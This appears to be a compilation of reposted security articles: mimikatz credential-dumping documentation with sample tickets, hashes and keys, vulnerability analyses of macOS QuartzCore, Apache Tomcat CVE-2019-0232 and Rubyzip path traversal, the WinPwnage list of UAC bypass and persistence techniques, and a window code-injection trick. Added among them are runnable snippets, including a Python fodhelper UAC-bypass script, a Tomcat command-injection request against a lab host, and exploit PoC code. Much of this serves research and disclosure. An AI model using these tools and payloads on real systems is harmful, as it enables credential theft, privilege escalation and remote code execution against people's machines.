mimikatz # sekurlsa::tickets /export
Authentication Id : 0 ; 541043 (00000000:00084173)
Session : Interactive from 2
User Name : Administrateur
Domain : CHOCOLATE
SID : S-1-5-21-130452501-2365100805-3685010670-500
* Username : Administrateur
* Domain : CHOCOLATE.LOCAL
* Password : (null)
Group 0 - Ticket Granting Service
[00000000]
Start/End/MaxRenew: 11/05/2014 16:47:59 ; 12/05/2014 02:47:58 ; 18/05/2014 16:47:58
Service Name (02) : ldap ; srvcharly.chocolate.local ; @ CHOCOLATE.LOCAL
Target Name (02) : ldap ; srvcharly.chocolate.local ; @ CHOCOLATE.LOCAL
Client Name (01) : Administrateur ; @ CHOCOLATE.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
d0195b657e63cdec73f32bf44d36bb12a62c928de6db9964b5a87c55721f8d04
Ticket : 0x00000012 - aes256_hmac ; kvno = 5 [...]
* Saved to file [0;84173]-0-0-40a50000-Administrateur@ldap-srvcharly.chocolate.local.kirbi !
[00000001]
Start/End/MaxRenew: 11/05/2014 16:47:59 ; 12/05/2014 02:47:58 ; 18/05/2014 16:47:58
Service Name (02) : LDAP ; srvcharly.chocolate.local ; chocolate.local ; @ CHOCOLATE.LOCAL
Target Name (02) : LDAP ; srvcharly.chocolate.local ; chocolate.local ; @ CHOCOLATE.LOCAL
Client Name (01) : Administrateur ; @ CHOCOLATE.LOCAL ( CHOCOLATE.LOCAL )
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
60cedabb5c3e2874131e9770c2d858fdec0342acf8c8787771d7c4475ace0392
Ticket : 0x00000012 - aes256_hmac ; kvno = 5 [...]
* Saved to file [0;84173]-0-1-40a50000-Administrateur@LDAP-srvcharly.chocolate.local.kirbi !
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 11/05/2014 16:47:58 ; 12/05/2014 02:47:58 ; 18/05/2014 16:47:58
Service Name (02) : krbtgt ; CHOCOLATE.LOCAL ; @ CHOCOLATE.LOCAL
Target Name (02) : krbtgt ; CHOCOLATE.LOCAL ; @ CHOCOLATE.LOCAL
Client Name (01) : Administrateur ; @ CHOCOLATE.LOCAL ( CHOCOLATE.LOCAL )
Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
4b42cce01deffbfb0e67efc18c993bb52601848763aecf322030329cd1882e4c
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;84173]-2-0-40e10000-Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi !
See also: Pass-The-Ticket: kerberos::ptt; Golden Ticket: kerberos::golden
ekeys
mimikatz # sekurlsa::ekeys
Authentication Id : 0 ; 541043 (00000000:00084173)
Session : Interactive from 2
User Name : Administrateur
Domain : CHOCOLATE
SID : S-1-5-21-130452501-2365100805-3685010670-500
* Username : Administrateur
* Domain : CHOCOLATE.LOCAL
* Password : (null)
* Key List :
aes256_hmac b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
rc4_hmac_nt cc36cf7a8514893efccd332446158b1a
rc4_hmac_old cc36cf7a8514893efccd332446158b1a
rc4_md4 cc36cf7a8514893efccd332446158b1a
rc4_hmac_nt_exp cc36cf7a8514893efccd332446158b1a
rc4_hmac_old_exp cc36cf7a8514893efccd332446158b1a
dpapi
mimikatz # sekurlsa::dpapi
Authentication Id : 0 ; 251812 (00000000:0003d7a4)
Session : Interactive from 1
User Name : Administrateur
Domain : CHOCOLATE
SID : S-1-5-21-130452501-2365100805-3685010670-500
[00000000]
* GUID : {62f69fd3-0a99-4531-bf94-7442fdf1e411}
* Time : 01/05/2014 13:12:39
* Key : 8801bde168af739ab81aa32b79aa0ee4c27cb9c0dc94b6ab0a8516e650b4bdd565110ae1040d3e47add422454d92b307276bebdba7b23b2b2f8005066ede3580
minidump
mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'
mimikatz # sekurlsa::logonpasswords
Opening : 'lsass.dmp' file for minidump...
Authentication Id : 0 ; 88038 (00000000:000157e6)
Session : Interactive from 1
User Name : Gentil Kiwi
Domain : vm-w7-ult
SID : S-1-5-21-2044528444-627255920-3055224092-1000
msv :
[00000003] Primary
* Username : Gentil Kiwi
* Domain : vm-w7-ult
* LM : d0e9aee149655a6075e4540af1f22d3b
* NTLM : cc36cf7a8514893efccd332446158b1a
* SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
...
Remark (which dumps can be read on which platform):
dump from NT 5 x86 - works on NT 5 x86
dump from NT 5 x64 - works on NT 5 x64
dump from NT 6 x86 - works on NT 6 x86/x64 (with mimikatz x86)
dump from NT 6 x64 - works on NT 6 x64
Some errors:
ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->MajorVersion (A) != MIMIKATZ_NT_MAJOR_VERSION (B)
You tried to open a minidump from a Windows NT of another major version (NT5 vs NT6).
ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->ProcessorArchitecture (A) != PROCESSOR_ARCHITECTURE_xxx (B)
You try to open a minidump from a Windows NT of another architecture (x86 vs x64).

ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000002)
The minidump file was not found (check the path).

process
searchpasswords
msv

Authentication Id : 0 ; 3518063 (00000000:0035ae6f)
Session           : Unlock from 1
User Name         : Administrateur
Domain            : CHOCOLATE
SID               : S-1-5-21-130452501-2365100805-3685010670-500

msv :
[00010000] CredentialKeys
* RootKey : 2a099891174e2d700d44368255a53a1a0e360471343c1ad580d57989bba09a14
* DPAPI   : 43d7b788389b67ee3bcac1786f01a75f

Authentication Id : 0 ; 3463053 (00000000:0034d78d)
Session           : Interactive from 2
User Name         : utilisateur
Domain            : CHOCOLATE
SID               : S-1-5-21-130452501-2365100805-3685010670-1107

msv :
[00010000] CredentialKeys
* NTLM : 8e3a18d453ec2450c321003772d678d5
* SHA1 : 90bbad2741ee9c533eb8eb37f8fb4172b8896ffa
[00000003] Primary
* Username : utilisateur
* Domain   : CHOCOLATE
* LM       : 00000000000000000000000000000000
* NTLM     : 8e3a18d453ec2450c321003772d678d5
* SHA1     : 90bbad2741ee9c533eb8eb37f8fb4172b8896ffa

wdigest
kerberos

When using smartcard logon on the domain, lsass caches the PIN code of the smartcard:

mimikatz # sekurlsa::kerberos
[...]
kerberos :
* Username : Administrateur
* Domain   : CHOCOLATE.LOCAL
* Password : (null)
* PIN code : 1234

tspkg
livessp
ssp
credman

Sursa: https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa
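For context on the hashes these sekurlsa commands replay: the NT (NTLM) hash is just the MD4 digest of the UTF-16LE-encoded password, so it can be reproduced in a few lines. A minimal Python sketch follows; the password is a made-up placeholder, and note that recent OpenSSL builds move MD4 to the legacy provider, so hashlib.new("md4") may raise ValueError on some systems:

import hashlib

def nt_hash(password: str) -> str:
    # NT hash = MD4 over the UTF-16LE encoding of the password.
    # No salt is involved, which is what makes pass-the-hash possible.
    return hashlib.new("md4", password.encode("utf-16le")).hexdigest()

print(nt_hash("S3cr3tP@ss"))  # placeholder password, not from the article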
-
Detailed Analysis of macOS Vulnerability CVE-2019-8507
By Kai Lu | April 23, 2019

FortiGuard Labs Threat Analysis Report on a Memory Corruption Vulnerability in QuartzCore While Handling a Shape Object.

On March 25, 2019, Apple released macOS Mojave 10.14.4 and iOS 12.2. These two updates fixed a number of security vulnerabilities, including CVE-2019-8507 in QuartzCore (aka CoreAnimation), which I reported to Apple on January 3, 2019 through the FortiGuard Labs responsible disclosure process. For more details on the Apple updates, please refer to https://support.apple.com/en-us/HT209600. In this blog I will provide a detailed analysis of this issue on macOS. Some of the analysis techniques used can be found in my previous blog, "Detailed Analysis of macOS/iOS Vulnerability CVE-2019-6231".

0x01 A Quick Look

QuartzCore, also known as CoreAnimation, is a framework used by macOS and iOS to create animatable scene graphics. CoreAnimation uses a unique rendering model in which the graphics operations are run in a separate process: on macOS the process is WindowServer, on iOS it is backboard. The service named com.apple.CARenderServer in QuartzCore is usually referred to as CARenderServer. This service exists on both macOS and iOS and can be accessed from the Safari sandbox.

A memory corruption vulnerability exists when QuartzCore handles a shape object in the function CA::Render::Decoder::decode_shape() on macOS. This may lead to unexpected application termination. The following is the crash log of the WindowServer process when this issue is triggered.

0x02 Proof of Concept

In this section I will demonstrate a PoC (Proof of Concept) used to trigger this issue. The PoC is shown below, along with a comparison between the original Mach message and the crafted Mach message.

Figure 1. The diff between the crafted Mach message and the original Mach message

Through binary diffing, we only need to modify one byte, at offset 0xB6, from 0x06 to 0x86 in order to trigger this issue. As shown in the PoC's code, in order to send a crafted Mach message that triggers this issue, we first need to send a Mach message with msgh_id 40202 (the corresponding handler in the server is _XRegisterClient) to retrieve the connection ID for every newly-connected client. Once we get the value of the connection ID, we set this value at the corresponding offset (0x2C) in the crafted Mach message. Finally, we just send this Mach message to reproduce the vulnerability.

0x03 Analysis and Root Cause

In this section, I will dynamically debug this vulnerability with LLDB to determine the root cause. Note that you need to debug the WindowServer process over SSH. Based on the stack backtrace of the crashed thread from the crash log, we can set a conditional breakpoint on the function CA::Render::Server::ReceivedMessage::run_command_stream using the following commands. The value of conn_id can be obtained by setting a breakpoint at line 86 in the PoC's C code. After this breakpoint is hit, we can read the buffer data of the crafted Mach message I sent. The register r13 points to the crafted Mach message.

Figure 2. The crafted Mach message CARenderServer received

The function CA::Render::Decoder::decode_object(CA::Render::Decoder *this, CA::Render::Decoder *a2) is used to decode all kinds of object data. The buffer data starting at offset 0x70000907dd52 is an Image object (marked in green).

Figure 3. The crafted Mach message with an abnormal Image object
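As a rough illustration of the mutation step described in the PoC section above, here is a minimal Python sketch. The file names are hypothetical (the real PoC builds the message in C), and the little-endian packing of the connection ID is my assumption rather than something stated in the article:

import struct

# Hypothetical capture of the original registration/render message.
data = bytearray(open("original_msg.bin", "rb").read())

# Patch the connection ID returned by the msgh_id 40202 handshake
# at offset 0x2C (assumed to be a 4-byte little-endian field).
conn_id = 0x1234
struct.pack_into("<I", data, 0x2C, conn_id)

# The single-byte mutation at offset 0xB6 that triggers the bug.
assert data[0xB6] == 0x06  # sanity check against the original message
data[0xB6] = 0x86

open("crafted_msg.bin", "wb").write(bytes(data))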
The following code branch is used to parse the Image object data in the function CA::Render::Decoder::decode_object.

Figure 4. The code branch that handles the Image object data

Next, let's take a closer look at how the Image object is handled. The following is the function CA::Render::Image::decode(); I have added some comments that explain what each field in the Image object means.

Figure 5. The function CA::Render::Image::decode()

We can see that the byte at offset 0x70000907dd52 was mutated from 0x06 to 0x86, so the variable v4 is now equal to 0x86. Because v4 is larger than 0x20, the program jumps to LABEL_31 to execute a different branch. At the end of LABEL_31, the program continues to handle the subsequent data, which represents a Texture object, by calling the function CA::Render::Texture::decode(CA::Render::Texture *this, CA::Render::Decoder *a2).

Figure 6. The function CA::Render::Texture::decode

We can see that it invokes the function CA::Render::Decoder::decode_shape to handle the Shape object data. Let's continue to trace how the next set of data is handled.

Figure 7. The function CA::Render::Decoder::decode_shape

We can see that the variable v2 is equal to 0x02, so it allocates a buffer whose size is 8 bytes. It then invokes the function CA::Render::Decoder::decode_bytes to decode several bytes of data. This function takes three parameters: the second points to the buffer previously allocated by malloc_zone_malloc, and the third is of type size_t, calculated by the expression "4LL * v2 - 12". With v2 == 0x02 this obviously causes an integer overflow, and the result is 0xfffffffffffffffc. So when bzero() is called, its first parameter points to a small buffer while its second parameter is a huge unsigned 64-bit integer, which leads to memory corruption.

Figure 8. The function CA::Render::Decoder::decode_bytes

The root cause of this issue is the lack of a proper bounds check in the function CA::Render::Decoder::decode_shape. Now that we have finished the detailed analysis of this vulnerability, let's look at how Apple fixed it.

Figure 9. Comparison of the code before and after the patch

0x04 Conclusion

Based on Apple's security update, this vulnerability only affects macOS. The issue exists in QuartzCore when handling a shape object in the function CA::Render::Decoder::decode_shape(), due to insufficient input validation. Through a comparison of the code before and after the patch, we can see that this issue was addressed with improved input validation.

0x05 Affected Versions

macOS Mojave 10.14.2
macOS Mojave 10.14.3

0x06 Analysis Environment

macOS 10.14.2 (18C54), MacBook Pro

0x07 Timeline

Discovery date: January 1, 2019
Notification date: January 3, 2019
Confirmation date: March 20, 2019
Release date: March 25, 2019

0x08 Reference

https://support.apple.com/en-us/HT209600
https://www.fortinet.com/blog/threat-research/detailed-analysis-of-macos-ios-vulnerability-cve-2019-6231.html
Sursa: https://www.fortinet.com/blog/threat-research/detailed-analysis-mac-os-vulnerability-cve-2019-8507.html
-
WordWarper – new code injection trick
April 23, 2019 in Code Injection

This is a trivial case of yet another piece of functionality that can help to execute code in a remote process. As with the PROPagate technique, it only affects selected windows, but it can of course be used as an evasion, especially in the early stages of a compromise.

Edit controls (including Rich Edit) are very common Windows controls present in most applications. They are either embedded directly or used as subclassed windows. When they display text in multiline mode, they use a so-called EditWordBreakProc callback function: any time the control needs to do something related to word wrapping, this procedure is called. One can modify this function for any window by sending the EM_SETWORDBREAKPROC message to it. If the window is an Edit control or a descendant of one, funny things may happen.

In order to see which windows are susceptible to such modification, I created a simple demo program that sends this message to every window on my desktop. After looking around and running some potential victim programs, I quickly found a good candidate to demo the technique: Sticky Notes (StikyNot). I ran it under the debugger to catch the moment it crashes, and then ran my test program. It changed the procedure for every window to 0x12345678. And this is what happens when you start typing in Sticky Notes after the procedure was changed:

I bet there are more programs that can be targeted this way, but as usual, I leave it as homework for the reader.

Sursa: http://www.hexacorn.com/blog/2019/04/23/wordwarper-new-code-injection-trick/
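To make the enumeration step concrete, here is a hedged Python sketch of a scanner in the spirit of the demo program described above. It only prints candidate edit controls by class name (subclassed and RichEdit windows use other class names, so this under-approximates the real attack surface); the destructive SendMessage call is left commented out because it will crash the owning process:

import ctypes
from ctypes import wintypes

user32 = ctypes.WinDLL("user32", use_last_error=True)

EM_SETWORDBREAKPROC = 0x00D0  # standard Edit control message

WNDENUMPROC = ctypes.WINFUNCTYPE(wintypes.BOOL, wintypes.HWND, wintypes.LPARAM)

def class_name(hwnd):
    buf = ctypes.create_unicode_buffer(256)
    user32.GetClassNameW(hwnd, buf, 256)
    return buf.value

@WNDENUMPROC
def on_child(hwnd, lparam):
    name = class_name(hwnd)
    if "edit" in name.lower():
        print(f"candidate edit control: {hwnd:#x} ({name})")
        # The actual PoC would now do:
        #   user32.SendMessageW(hwnd, EM_SETWORDBREAKPROC, 0, 0x12345678)
        # which crashes the owning process as soon as it word-wraps.
    return True

@WNDENUMPROC
def on_top_level(hwnd, lparam):
    user32.EnumChildWindows(hwnd, on_child, 0)
    return True

user32.EnumWindows(on_top_level, 0)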
-
WinPwnage

The goal of this repo is to study Windows penetration techniques. Techniques are found online, on different blogs and repos here on GitHub. I do not take credit for any of the findings; thanks to all the researchers.

UAC bypass techniques (a minimal sketch of the first one, fodhelper, follows the build notes below):
- UAC bypass using fodhelper
- UAC bypass using computerdefaults
- UAC bypass using slui
- UAC bypass using silentcleanup
- UAC bypass using compmgmtlauncher
- UAC bypass using sdclt (isolatedcommand)
- UAC bypass using sdclt (App Paths)
- UAC bypass using perfmon
- UAC bypass using eventviewer
- UAC bypass using sysprep (dll payload supported)
- UAC bypass using migwiz (dll payload supported)
- UAC bypass using mcx2prov (dll payload supported)
- UAC bypass using cliconfg (dll payload supported)
- UAC bypass using token manipulation
- UAC bypass using sdclt and Folder class
- UAC bypass using cmstp
- UAC bypass using .NET Code Profiler (dll payload supported)
- UAC bypass using mocking trusted directories (dll payload supported)
- UAC bypass using wsreset

Persistence techniques:
- Persistence using userinit key
- Persistence using image file execution option and magnifier
- Persistence using hkey_local_machine run key
- Persistence using hkey_current_user run key
- Persistence using schtask (SYSTEM privileges)
- Persistence using explorer dll hijack
- Persistence using mofcomp and mof file (SYSTEM privileges)
- Persistence using wmic (SYSTEM privileges)
- Persistence using startup files
- Persistence using Cortana App
- Persistence using People App
- Persistence using bitsadmin
- Persistence using Windows Service (SYSTEM privileges)

Elevation techniques:
- Elevate from administrator to NT AUTHORITY SYSTEM using handle inheritance
- Elevate from administrator to NT AUTHORITY SYSTEM using named pipe impersonation
- Elevate from administrator to NT AUTHORITY SYSTEM using token impersonation
- Elevate from administrator to NT AUTHORITY SYSTEM using schtasks (non interactive)
- Elevate from administrator to NT AUTHORITY SYSTEM using wmic (non interactive)
- Elevate from administrator to NT AUTHORITY SYSTEM using windows service (non interactive)

Execution techniques:
- Execute payload by calling the RegisterOCX function in Advpack.dll
- Execute payload using appvlp binary
- Execute payload from bash.exe if linux subsystem is installed
- Execute payload using diskshadow.exe from a prepared diskshadow script
- Execute payload as a subprocess of Dxcap.exe
- Execute payload since there is a match for notepad.exe in the system directory
- Execute payload using ftp binary
- Execute payload by calling the RegisterOCX function in ieadvpack.dll
- Execute payload by calling OpenURL in ieframe.dll
- Execute payload using the Program Compatibility Assistant
- Execute payload by calling the LaunchApplication function
- Execute payload by calling OpenURL in shdocvw.dll
- Execute payload using sqltoolsps binary
- Execute payload by calling OpenURL in url.dll
- Execute payload as a subprocess of vsjitdebugger.exe
- Execute payload by calling RouteTheCall in zipfldr.dll

Installing the Dependencies:

pip install -r requirements.txt

Build with py2exe:

In order to get a successful build, install the py2exe (http://www.py2exe.org) module and use the provided build.py script to compile all the scripts into a portable executable. This only seems to work on Python 2, not on Python 3.

python build.py winpwnage.py

Build with PyInstaller:

This build works on both Python 2 and Python 3 and puts the .exe file into the dist directory.
pip install pyinstaller
pyinstaller --onefile winpwnage.py

On Windows 10, Access Denied errors can occur while compiling; rerun until it succeeds, or elevate the prompt.

Read:
- https://wikileaks.org/ciav7p1/cms/page_2621770.html
- https://wikileaks.org/ciav7p1/cms/page_2621767.html
- https://wikileaks.org/ciav7p1/cms/page_2621760.html
- https://msdn.microsoft.com/en-us/library/windows/desktop/bb736357(v=vs.85).aspx
- https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/
- https://github.com/winscripting/UAC-bypass/
- https://www.greyhathacker.net/?p=796
- https://github.com/hfiref0x/UACME
- https://bytecode77.com/hacking/exploits/uac-bypass/performance-monitor-privilege-escalation
- https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation
- https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20workshops/DEFCON-25-Workshop-Ruben-Boobeb-UAC-0day-All-Day.pdf
- https://lolbas-project.github.io

Sursa: https://github.com/rootm0s/WinPwnage
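As promised above, here is a minimal, hedged Python sketch of the classic fodhelper technique from the UAC list. It is a sketch of the publicly documented registry hijack, not WinPwnage's own implementation; it assumes an unpatched Windows 10 build, a medium-integrity user in the Administrators group, and a placeholder payload:

import subprocess
import winreg

KEY = r"Software\Classes\ms-settings\Shell\Open\command"
PAYLOAD = r"C:\Windows\System32\cmd.exe"  # placeholder payload

# fodhelper.exe is auto-elevated and resolves its ms-settings protocol
# handler from HKCU, so a standard user can plant the command it runs.
key = winreg.CreateKey(winreg.HKEY_CURRENT_USER, KEY)
winreg.SetValueEx(key, None, 0, winreg.REG_SZ, PAYLOAD)       # (Default)
winreg.SetValueEx(key, "DelegateExecute", 0, winreg.REG_SZ, "")
winreg.CloseKey(key)

subprocess.run(r"C:\Windows\System32\fodhelper.exe")

# Clean up so the hijack does not persist (remaining empty parent
# keys can be deleted the same way).
winreg.DeleteKey(winreg.HKEY_CURRENT_USER, KEY)
winreg.DeleteKey(winreg.HKEY_CURRENT_USER, r"Software\Classes\ms-settings\Shell\Open")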
-
Uncovering CVE-2019-0232: A Remote Code Execution Vulnerability in Apache Tomcat
Posted on: April 24, 2019 at 4:57 am
Posted in: Vulnerabilities
Author: Trend Micro
by Santosh Subramanya and Raghvendra Mishra

Apache Tomcat, colloquially known as Tomcat Server, is an open-source Java Servlet container developed by a community with the support of the Apache Software Foundation (ASF). It implements several Java EE specifications, including Java Servlet, JavaServer Pages (JSP), Java Expression Language (EL), and WebSocket, and provides a "pure Java" HTTP web server environment in which Java code can run.

On April 15, Nightwatch Cybersecurity published information on CVE-2019-0232, a remote code execution (RCE) vulnerability involving Apache Tomcat's Common Gateway Interface (CGI) Servlet. This high-severity vulnerability could allow attackers to execute arbitrary commands by abusing an operating system command injection brought about by a Tomcat CGI Servlet input validation error. This blog entry delves deeper into this vulnerability by expounding on what it is, how it can be exploited, and how it can be addressed.

Understanding CVE-2019-0232

CGI is a protocol that is used to manage how web servers interact with applications. These applications, called CGI scripts, are used to execute programs external to the Tomcat Java virtual machine (JVM). The CGI Servlet, which is disabled by default, generates command line parameters from a query string. However, Tomcat servers running on Windows machines that have the CGI Servlet parameter enableCmdLineArguments enabled are vulnerable to remote code execution due to a bug in how the Java Runtime Environment (JRE) passes command line arguments to Windows.

In Apache Tomcat, the file web.xml is used to define default values for all web applications loaded into a Tomcat instance. The CGI Servlet is one of the servlets provided by default. This servlet supports the execution of external applications that conform to the CGI specification. Typically, the CGI Servlet is mapped to the URL pattern "/cgi-bin/*", meaning any CGI applications that are executed must be present within the web application.

A new process in Windows is launched by calling the CreateProcess() function, which takes the command line as a single string (the lpCommandLine parameter to CreateProcess):

int CreateProcess( ..., lpCommandLine, ... )

In Windows, arguments are not passed separately as an array of strings but rather in a single command-line string. This requires the program to parse the command line itself, by extracting the command line string using the GetCommandLine() API and then parsing the arguments string using the CommandLineToArgvW() helper function. This is depicted below:

Cmdline = "program.exe hello world"

Figure 1. Command line string for Windows

Argv[0] -> program.exe
Argv[1] -> hello
Argv[2] -> world

The vulnerability occurs due to the improper passing of command line arguments from the JRE to Windows. For Java applications, ProcessBuilder() is called before the CreateProcess() function kicks in. The arguments are then passed to the static method start of ProcessImpl(), which is a platform-dependent class. In the Windows implementation of ProcessImpl(), the start method calls the private constructor of ProcessImpl(), which creates the command line for the CreateProcess call.

Figure 2. Command line string for Java apps
ProcessImpl() builds the Cmdline and passes it to the CreateProcess() Windows function, after which CreateProcess() executes .bat and .cmd files in a cmd.exe shell environment. If the file to be run has a .bat or .cmd extension, the image to be run becomes cmd.exe, the Windows command prompt. CreateProcess() then restarts at Stage 1, with the name of the batch file passed as the first parameter to cmd.exe. This results in 'hello.bat ...' becoming 'C:\Windows\system32\cmd.exe /c "hello.bat ..."'. Because the quoting rules for CommandLineToArgvW differ from cmd's, an additional set of quoting rules would need to be applied to avoid command injection in the command line interpreted by cmd.exe. Since Java (ProcessImpl()) does no additional quoting for this implicit cmd.exe promotion, the passed arguments are now processed by cmd.exe, which presents inherent issues if the arguments are not quoted for cmd.exe properly.

Argument parsing by cmd.exe

We begin with the understanding that cmd is essentially a text preprocessor: given a command line, it makes a series of textual transformations and then hands the transformed command line to CreateProcess(). Some transformations replace environment variable names with their values. Transformations such as those triggered by the &, ||, and && operators split command lines into several parts. All of cmd's transformations are triggered by the presence of one of the following metacharacters: (, ), %, !, ^, ", <, >, &, and |.

The metacharacter " is particularly interesting: when cmd is transforming a command line and sees a ", it copies a " to the new command line and then begins copying characters from the old command line to the new one without checking whether any of these characters is a metacharacter. This continues until cmd either reaches the end of the command line, runs into a variable substitution, or sees another ". If we rely on cmd's "-behavior to protect arguments, using quotation marks will produce unexpected behavior. By passing untrusted data as command line parameters, the bugs caused by this convention mismatch become a security issue. Take, for example, the following:

hello.bat "dir \"&whoami"
0: [hello.bat]
1: [&dir]

Here, cmd interprets the & metacharacter as a command separator because, from its point of view, the & character lies outside the quoted region. In this scenario, 'whoami' can be replaced by any number of harmful commands. When running the command shown above with hello.bat, we get the following output.

Figure 3. The resulting output when running "hello.bat"

The issue shown in the screenshot is used against Apache Tomcat to successfully perform command execution, as shown in the following image:

Figure 4. Performing command execution in Apache Tomcat

To successfully perform command injection, we need to add a few parameters and enable the CGI Servlet in the web.xml file.

Figure 5. Snapshot of web.xml
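Assuming a lab instance configured as above (CGI servlet mapped to /cgi-bin/*, enableCmdLineArguments set to true, and a hello.bat present in the web application), a request along these lines exercises the injection. Host, port, and file names are all assumptions, and the exact characters that survive depend on the Tomcat version's URL decoding and allowed-character settings:

import requests

# Hypothetical lab target. The query string must contain no "=" so the
# CGI servlet turns it into command-line arguments; the "&" is then
# treated by cmd.exe as a command separator, as explained above.
url = "http://192.168.56.10:8080/cgi-bin/hello.bat?&whoami"
resp = requests.get(url)
print(resp.status_code)
print(resp.text)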
The Apache Software Foundation has introduced a new parameter, cmdLineArgumentsDecoded, in the Apache Tomcat CGI Servlet that is designed to address CVE-2019-0232. cmdLineArgumentsDecoded is only used when enableCmdLineArguments is set to true. It defines a regex pattern "[[a-zA-Z0-9\Q-_.\\/:\E]+]" that individual decoded command line arguments must match, or else the request will be rejected. The introduced patch eliminates the vulnerability that arises from using spaces and double quotes in command line arguments.

Figure 6. The Apache Tomcat patch, which can be found in the codebase

Recommendations and Trend Micro Solutions

The Apache Software Foundation recommends that users running Apache Tomcat upgrade their software to the latest versions:

Version         | Recommended Patch
Apache Tomcat 9 | Apache Tomcat 9.0.18 or later
Apache Tomcat 8 | Apache Tomcat 8.5.40 or later
Apache Tomcat 7 | Apache Tomcat 7.0.93 or later

Furthermore, users should set the CGI Servlet initialization parameter enableCmdLineArguments to false to prevent possible exploitation of CVE-2019-0232.

Developers, programmers, and system administrators using Apache Tomcat can also consider multilayered security technology such as Trend Micro™ Deep Security™ and Vulnerability Protection solutions, which protect user systems from threats that may exploit CVE-2019-0232 via the following Deep Packet Inspection (DPI) rule:

1009697 – Apache Tomcat Remote Code Execution Vulnerability (CVE-2019-0232)

Trend Micro TippingPoint® Threat Protection System customers are protected from attacks that exploit CVE-2019-0232 via the following MainlineDV filter:

315387 – HTTP: Apache Tomcat Remote Code Execution on Windows

Sursa: https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/
-
On insecure zip handling, Rubyzip and Metasploit RCE (CVE-2019-5624)
24 Apr 2019 - Posted by Luca Carettoni

During one of our projects we had the opportunity to audit a Ruby-on-Rails (RoR) web application handling zip files using the Rubyzip gem. Zip files have always been an interesting entry point for triggering multiple vulnerability types, including path traversals and symlink file overwrite attacks. As the library under testing had symlink processing disabled, we focused on path traversal exploitation. This blog post discusses our results, the "bug" discovered in the library itself, and the implications of such an issue in a popular piece of software - Metasploit.

Rubyzip and old vulnerabilities

The Rubyzip gem has a long history of path traversal vulnerabilities (1, 2) through malicious filenames. Particularly interesting was the code change in PR #376, where different handling was implemented by the developers:

# Extracts entry to file dest_path (defaults to @name).
# NB: The caller is responsible for making sure dest_path is safe,
# if it is passed.
def extract(dest_path = nil, &block)
  if dest_path.nil? && !name_safe?
    puts "WARNING: skipped #{@name} as unsafe"
    return self
  end
  [...]

Entry#name_safe is defined a few lines before as:

# Is the name a relative path, free of `..` patterns that could lead to
# path traversal attacks? This does NOT handle symlinks; if the path
# contains symlinks, this check is NOT enough to guarantee safety.
def name_safe?
  cleanpath = Pathname.new(@name).cleanpath
  return false unless cleanpath.relative?
  root = ::File::SEPARATOR
  naive_expanded_path = ::File.join(root, cleanpath.to_s)
  cleanpath.expand_path(root).to_s == naive_expanded_path
end

In the code above, if the destination path is passed to the Entry#extract function, then it is not actually checked. A comment in the source code of that function highlights the user's responsibility:

# NB: The caller is responsible for making sure dest_path is safe, if it is passed.

While Entry#name_safe is a fair check against path traversals (and absolute paths), it is only executed when the function is called without arguments. In order to verify the library bug, we generated a ZIP PoC using the old (and still good) evilarc and extracted the malicious file using the following code:

require 'zip'

first_arg, *the_rest = ARGV

Zip::File.open(first_arg) do |zip_file|
  zip_file.each do |entry|
    puts "Extracting #{entry.name}"
    entry.extract(entry.name)
  end
end

$ ls /tmp/file.txt
ls: cannot access '/tmp/file.txt': No such file or directory
$ zipinfo absolutepath.zip
Archive: absolutepath.zip
Zip file size: 289 bytes, number of entries: 2
drwxr-xr-x 2.1 unx 0 bx stor 18-Jun-13 20:13 /tmp/
-rw-r--r-- 2.1 unx 5 bX defN 18-Jun-13 20:13 /tmp/file.txt
2 files, 5 bytes uncompressed, 7 bytes compressed: -40.0%
$ ruby Rubyzip-poc.rb absolutepath.zip
Extracting /tmp/
Extracting /tmp/file.txt
$ ls /tmp/file.txt
/tmp/file.txt

This results in a file being created in /tmp/file.txt, which confirms the issue. As happened with our client, most developers might have upgraded to Rubyzip 1.2.2 thinking it was safe to use, without actually verifying how the library works or its specific usage in the codebase.

It would have been vulnerable anyway ¯\_(ツ)_/¯

In the context of our web application, the user-supplied zip was decompressed through the following (pseudo) code:
def unzip(input)
  uuid = get_uuid()
  # 0. create a 'Pathname' object with the new uuid
  parent_directory = Pathname.new("#{ENV['uploads_dir']}/#{uuid}")

  Zip::File.open(input[:zip_file].to_io) do |zip_file|
    zip_file.each_with_index do |entry, index|
      # 1. check the file is not present
      next if File.file?(parent_directory + entry.name)
      # 2. extract the entry
      entry.extract(parent_directory + entry.name)
    end
  end
  Success
end

In item #0 we can see that a Pathname object is created and then used as the destination path of the decompressed entry in item #2. However, the sum operator between objects and strings does not work as many developers would expect and might result in unintended behavior. We can easily observe its behavior in an IRB shell:

$ irb
irb(main):001:0> require 'pathname'
=> true
irb(main):002:0> parent_directory = Pathname.new("/tmp/random_uuid/")
=> #<Pathname:/tmp/random_uuid/>
irb(main):003:0> entry_path = Pathname.new(parent_directory + File.dirname("../../path/traversal"))
=> #<Pathname:/path>
irb(main):004:0> destination_folder = Pathname.new(parent_directory + "../../path/traversal")
=> #<Pathname:/path/traversal>
irb(main):005:0> parent_directory + "../../path/traversal"
=> #<Pathname:/path/traversal>

